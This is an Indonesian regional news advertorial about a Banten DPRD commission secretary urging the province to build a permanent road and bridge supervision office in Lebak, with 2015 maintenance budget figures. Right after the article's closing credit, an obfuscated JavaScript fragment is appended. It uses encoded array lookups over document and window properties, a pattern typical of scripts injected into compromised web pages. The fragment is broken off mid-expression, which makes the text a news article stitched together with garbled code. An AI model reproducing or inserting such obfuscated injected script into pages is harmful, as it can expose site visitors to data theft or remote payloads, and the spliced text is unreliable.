Sekretaris Komisi IV DPRD Provinsi Banten, Thoni Fhatoni Mukson meminta kepada Dinas Bina Marga dan Tata Ruang (DBMTR) untuk segera membangun Kantor Balai Pengawasan Jalan dan Jembatan di Kabupaten Lebak. Mengingat keberadaan Kantor Balai Pemilaharan Jalan dan Jembatan di Kabupaten Lebak ngontrak sehingga tidak memaksimalkan dalam melakukan pemeliharaan, perawatan jalan dan jembatan.

“Selama ini Kantor Balai Pengawasan Jalan dan Jembatan di Kabupaten Lebak ngontrak. Karena itu saya minta DBMTR Provinsi Banten segera membangun Kantor Balai Pengawasan Jalan dan Jembatan secara permanen,” kata Thoni, kemarin.

Dikatakan Thoni, diperkirakan lahan yang dibutuhkan untuk membangun Kantor Balai Pengawasan Jalan dan Jembatan di Kabupaten Lebak seluas 1 hektar. Mengingat peruntukan lahannya tidak hanya berfungsi sebagai kantor, juga untuk menyimpan peralatan. “Pada tahun anggaran 2016 nanti, DBMTR Provinsi Banten harus memprioritaskan pembangunan Kantor Balai Pengawasan Jalan dan Jembatan di Kabupaten Lebak,” ujarnya.

Ditegaskan Thoni, untuk merealisasikan pembangunan Kantor Balai Pengawasan Jalan dan Jembatan di Kabupaten Lebak, ia akan melakukan koordinasi dengan Kepala DBMTR Provinsi Banten, Widodo Hadi. “Saya akan segera melakukan koordinasi dengan Kepala DBMTR, mudah-mudahan yang bersangkutan bisa merealisasikan pembangunan Kantor Balai Pengawasan Jalan dan Jembatan di Kabupaten Lebak. Terlebih lagi Balainya sendiri sudah mengusulkan,” terangnya.

Thoni menambahkan, anggaran pemilaharan jalan dan jembatan milik Provinsi Banten di Kabupaten Lebak pada tahun anggaran 2015 sebesar Rp 10 miliar, sedangkan anggaran pemeliharan jalan dan jembatan di Kabupaten Pandeglang, Serang, Cilegon, dan Tangerang rata-rata sebesar Rp 17 miliar. “Saya berharap penggunaan anggaran pemeliharan jalan dan jembatan dimaksimalkan, agar kondisi jalan Provinsi di Kabupaten/Kota bisa nyaman bagi para pengendara mobil dan motor,” katanya. (DPRD Provinsi Banten/Adv) + _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}